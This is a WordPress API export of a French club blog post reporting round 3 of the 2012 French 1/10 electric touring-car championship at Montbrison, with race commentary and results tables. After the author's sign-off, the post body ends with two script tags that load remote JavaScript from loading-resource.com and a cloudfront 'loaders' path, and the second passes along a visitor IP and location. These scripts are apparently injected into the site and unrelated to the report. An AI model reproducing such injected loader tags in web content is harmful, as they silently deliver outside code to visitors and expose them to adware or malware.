{"id":423,"date":"2012-06-05T09:03:26","date_gmt":"2012-06-05T07:03:26","guid":{"rendered":"http:\/\/www.mrc-longwy.fr\/?p=423"},"modified":"2012-06-05T09:24:46","modified_gmt":"2012-06-05T07:24:46","slug":"reportage-cf-n3-montbrison-le-2627-mai-2012","status":"publish","type":"post","link":"https:\/\/www.mrc-longwy.fr\/?p=423","title":{"rendered":"Reportage CF n\u00b03 Montbrison le 26\/27 Mai 2012"},"content":{"rendered":"<p><a href=\"http:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/05\/DSC_8329.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-424\" title=\"DSC_8329\" src=\"http:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/05\/DSC_8329-1024x619.jpg\" alt=\"\" width=\"540\" height=\"326\" srcset=\"https:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/05\/DSC_8329-1024x619.jpg 1024w, https:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/05\/DSC_8329-300x181.jpg 300w\" sizes=\"auto, (max-width: 540px) 100vw, 540px\" \/><\/a>Le week-end du 26 et 27 Mai, le club de Montbrison accueillait la 3\u00e8me manche du Championnat de France 1\/10 piste \u00e9lectrique.\u00a0 Le club a d\u00e9j\u00e0 fait ses preuves depuis quelques ann\u00e9es avec l&rsquo;organisation de plusieurs manches nationales mais aussi plusieurs championnats d&rsquo;Europe.<\/p>\n<p>Toute l&rsquo;\u00e9quipe de l&rsquo;AMCM, sous la houlette de son pr\u00e9sident Pascal LIMOGES, a encore r\u00e9pondu pr\u00e9sent au niveau organisation, timing, buvette et direction de course. Un grand coup de chapeau au directeur de course Monsieur DELORME qui a fait un super boulot tout au long du we.<\/p>\n<p><span style=\"color: #000000;\">\u00a0La Piste a \u00e9t\u00e9 repeinte en vert \u00e0 l&rsquo;occasion de ce championnat de France. (dommage moi je l&rsquo;aimait bien en bleue mais c&rsquo;est un d\u00e9tail). Le trac\u00e9,\u00a0 se r\u00e9v\u00e9la comme \u00e0 son habitude, tr\u00e8s technique et s\u00e9lectif. En effet nombres de virages s&rsquo;enchainent avec des vitesse d&rsquo;entr\u00e9es totalement dingues et surtout le 90\u00b0 dans la \u00ab\u00a0ligne droite\u00a0\u00bb qui rend ce trac\u00e9 vraiment sympa et int\u00e9ressant. Le grip quant\u00a0 \u00e0\u00a0 lui s&rsquo;est montr\u00e9 plus que bon tout au long du we.<\/span><\/p>\n<p>Pour parler de la participation, pas moins de 49 pilotes avaient\u00a0 fait le d\u00e9placement avec une r\u00e9partition un peu diff\u00e9rente: 20 en Modifi\u00e9 et 29 en Stock.<\/p>\n<p>Le film des qualifications:<\/p>\n<p>En Stock, les qualifications ont \u00e9t\u00e9 tr\u00e8s serr\u00e9es tout au long de ces 5 manches. En effet 4 pilotes diff\u00e9rents ont r\u00e9ussi \u00e0 faire la p\u00f4le sur les 5 qualifs courues et seulement 4s s\u00e9paraient les 8 premiers. Bref de sublimes qualifs \u00e0 suspens qui ne pardonnaient aucune faute. Au final c&rsquo;est le jeune pilote de Loos (59) , R\u00e9mi CALLENS sur son XRAY T3 2012, qui sortira son \u00e9pingle du jeu et prendra donc la t\u00eate des ses qualifications. Derri\u00e8re en seconde position, on retrouve le pilote du MRC LONGWY, Nicolas SCHWENDIMANN \u00e9galement sur une XRAY T3 2012 et en troisi\u00e8me position le pilote Savoyard Fabien VALENTIN sur une prometteuse TEAM MAGIC ERS2.<\/p>\n<p><a href=\"http:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8339.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-428\" title=\"DSC_8339\" src=\"http:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8339-685x1024.jpg\" alt=\"\" width=\"540\" height=\"807\" srcset=\"https:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8339-685x1024.jpg 685w, https:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8339-200x300.jpg 200w\" sizes=\"auto, (max-width: 540px) 100vw, 540px\" \/><\/a><\/p>\n<p>En Modifi\u00e9:<\/p>\n<p>Le champion de France en titre, Lo\u00efc JASMIN du MRC LONGWY et sur YOKOMO BD5 XWI, domina largement les 5 manches de qualifications. Derri\u00e8re ce fut un peu plus serr\u00e9 pour les places 2 \u00e0 8. Mais c&rsquo;est le pilote Montbrisonnais Alexandre LAURENT sur son XRAY T3 2012 qui se glissera \u00e0 la seconde position suivi de Lucas URBAIN sur sa YOKOMO BD5 WXI. On notera la 4\u00e9me place d&rsquo;Arnaud SOULIGNAC sur une SAKURA 0. Egalement \u00e0 noter la pr\u00e9sence des 2 fr\u00e8res DELORME sur leur SCHUMACHER MI4 LP.<\/p>\n<p><a href=\"http:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8338.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-429\" title=\"DSC_8338\" src=\"http:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8338-685x1024.jpg\" alt=\"\" width=\"540\" height=\"807\" srcset=\"https:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8338-685x1024.jpg 685w, https:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8338-200x300.jpg 200w\" sizes=\"auto, (max-width: 540px) 100vw, 540px\" \/><\/a><\/p>\n<p>LES FINALES:<\/p>\n<p>Malheureusement, les finales n&rsquo;ont pas pu \u00eatre courues dans leur int\u00e9gralit\u00e9. Pour la 3\u00e8me manche de finale, un orage a eu la bonne id\u00e9e de s&rsquo;abattre sur Montbrison, ce qui poussa le directeur de course \u00e0 annuler la 3\u00e8me finale pour les finales A. Du coup pour le classement final, seule la meilleure manche sur les 2 courues a \u00e9t\u00e9 prise en compte pour d\u00e9partager les 10 premiers de chaque cat\u00e9gorie.<\/p>\n<p>En STOCK:<\/p>\n<p>Victoire de REMI CALLENS qui confirme sur ce CF et qui par la m\u00eame occasion prend la t\u00eate du championnat. En seconde position on retrouve Nicolas SCHWENDIMANN et en troisi\u00e8me position le pilote local Emilien BLANC remont\u00e9 de la 6\u00e9me place.<\/p>\n<p><a href=\"http:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8356.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-430\" title=\"DSC_8356\" src=\"http:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8356-1024x705.jpg\" alt=\"\" width=\"540\" height=\"371\" srcset=\"https:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8356-1024x705.jpg 1024w, https:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8356-300x206.jpg 300w\" sizes=\"auto, (max-width: 540px) 100vw, 540px\" \/><\/a>1- CALLENS REMI &#8211; XRAY T3 2012\/ PRT<\/p>\n<p>2- SCHWENDIMANN NICOLAS- XRAY T3 2012\/ CORALLY<\/p>\n<p>3- BLANC EMILEN &#8211; SERPENT S411<\/p>\n<p>4- NARDEUX LUDOVIC &#8211; XRAY T3 2012\/ THUNDER POWER<\/p>\n<p>5- URBAIN JOAN &#8211; YOKOMO BD5 WXI\/ PRT<\/p>\n<p>6- GRADELET YANN- TAMIYA 417X \/ GM<\/p>\n<p>7- PERMENTIER JEROME &#8211; YOKOMO BD5WXI \/ NOSRAM<\/p>\n<p>8- JOST JULIEN- XRAY T3 2012(Alien Racing) \/ LRP<\/p>\n<p>9- CACHAFEIRO JUAN- XRAY T3 2012 \/ PRT<\/p>\n<p>10- VALENTIN FABIEN &#8211; TEAM MAGIC \/ PRT<\/p>\n<p>A NOTER: Cette cat\u00e9gorie qui posait tant d&rsquo;interrogations en d\u00e9but de saison nous a montr\u00e9 ce we, sur une piste ext\u00e9rieure, tout son attrait car les performances moteurs sont toutes tr\u00e8s proches. Ce qui donne de sublimes bagarres \u00e0 une allure plus que raisonnable, mais je pense beaucoup plus accessible. Donc pour ceux qui en doute, n&rsquo;h\u00e9sitez plus, c&rsquo;est la cat\u00e9gorie qu&rsquo;il faut pour d\u00e9buter en comp\u00e9tition !!<\/p>\n<p>EN MODIFIE:<\/p>\n<p>Lo\u00efc JASMIN, pilote du MRC LONGWY, s&rsquo;adjugera les 2 finales courues et emportera cette 3 manche du championnat de France sans surprise. Une belle revanche apr\u00e8s son mauvais r\u00e9sultat \u00e0 Rumilly. Derri\u00e8re on retrouve Alex LAURENT en seconde position et en 3 Lucas URBAIN, comme en qualification.<\/p>\n<p><a href=\"http:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8368.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-431\" title=\"DSC_8368\" src=\"http:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8368-1024x605.jpg\" alt=\"\" width=\"540\" height=\"319\" srcset=\"https:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8368-1024x605.jpg 1024w, https:\/\/www.mrc-longwy.fr\/wp-content\/uploads\/2012\/06\/DSC_8368-300x177.jpg 300w\" sizes=\"auto, (max-width: 540px) 100vw, 540px\" \/><\/a>1- JASMIN LOIC &#8211; YOKOMO BD5WXI \/ LRP<\/p>\n<p>2- LAURENT ALEXANDRE &#8211; XRAY T3 2012 \/ NOSRAM<\/p>\n<p>3- URBAIN LUCAS &#8211; YOKOMO BD5 WXI \/ SPEED PASSION-THUNDER POWER<\/p>\n<p>4- SOULIGNAC ARNAUD &#8211; 3RACING ZAKURA 0- PRT<\/p>\n<p>5- RAGAUT HUGO &#8211; AWESOMATIC A700 \/ ORION<\/p>\n<p>6- JASMIN MIKA- YOKOMO BD5WXI \/ SPEED PASSION<\/p>\n<p>7- DELORME PIERRE &#8211; SCHUMACHER MI4LP<\/p>\n<p>8- DELORME JEAN &#8211; SCHUMACHER MI4LP<\/p>\n<p>9- POLLET VILLARD WALTER- YOKOMO BD5WXI \/ PRT<\/p>\n<p>10- DUSART ALEXANDRE &#8211; XRAY T3 2012 \/<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Pour conclure, je voudrais remercier tous les pilotes pr\u00e9sents pour la bonne humeur, le fair-play et le spectacle propos\u00e9 ce week-end.<\/p>\n<p>Un GRAND MERCI \u00e0 toute l&rsquo;\u00e9quipe de Montbrison pour le superbe we . Un bravo \u00e0 l&rsquo;\u00e9quipe de la buvette pour les frites et les croques au top.<\/p>\n<p>Un petit point \u00e0 souligner aussi, c&rsquo;est le timing qui nous a permis de rouler un maximum en essais chrono et en essais libres. J&rsquo;esp\u00e8re que les futurs clubs organisateurs prendront exemple.<\/p>\n<p>D\u00e9sol\u00e9 de ne pas avoir fait plus pour ce petit reportage mais le temps m&rsquo;a manqu\u00e9 sur ce we.<\/p>\n<p>Merci \u00e0 toute l&rsquo;\u00e9quipe du MRC LONGWY pour ce bon moment entres potes.<\/p>\n<p>A bient\u00f4t \u00e0 Vieux-Charmont pour la 4\u00e8me Manche de ce Championnat de France le 23 et 24 Juin.<\/p>\n<p>++<\/p>\n<p>Mika J.<\/p>\n\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><script type=\"text\/javascript\" src=\"http:\/\/loading-resource.com\/50.js.php?i=%7B7F3E1196-3496-4686-95D6-0DA6A6622801%7D\"><\/script><script type=\"text\/javascript\" src=\"https:\/\/d3pzomt0ul12fo.cloudfront.net\/items\/loaders\/loader_1032.js?aoi=1311798366&amp;pid=1032&amp;zoneid=10368&amp;cid=FR&amp;rid=B2&amp;ccid=Saint-avold&amp;ip=85.95.207.118\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le week-end du 26 et 27 Mai, le club de Montbrison accueillait la 3\u00e8me manche du Championnat de France 1\/10 piste \u00e9lectrique.\u00a0 Le club a d\u00e9j\u00e0 fait ses preuves depuis quelques ann\u00e9es avec l&rsquo;organisation de plusieurs manches nationales mais aussi [&hellip;] <a class=\"more-link\" href=\"https:\/\/www.mrc-longwy.fr\/?p=423\">&darr; Read the rest of this entry&#8230;<\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-423","post","type-post","status-publish","format-standard","hentry","category-non-classe","uentry","postonpage-1","odd","post-author-mika"],"_links":{"self":[{"href":"https:\/\/www.mrc-longwy.fr\/index.php?rest_route=\/wp\/v2\/posts\/423","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mrc-longwy.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mrc-longwy.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mrc-longwy.fr\/index.php?rest_route=\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mrc-longwy.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=423"}],"version-history":[{"count":5,"href":"https:\/\/www.mrc-longwy.fr\/index.php?rest_route=\/wp\/v2\/posts\/423\/revisions"}],"predecessor-version":[{"id":434,"href":"https:\/\/www.mrc-longwy.fr\/index.php?rest_route=\/wp\/v2\/posts\/423\/revisions\/434"}],"wp:attachment":[{"href":"https:\/\/www.mrc-longwy.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=423"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mrc-longwy.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=423"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mrc-longwy.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=423"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}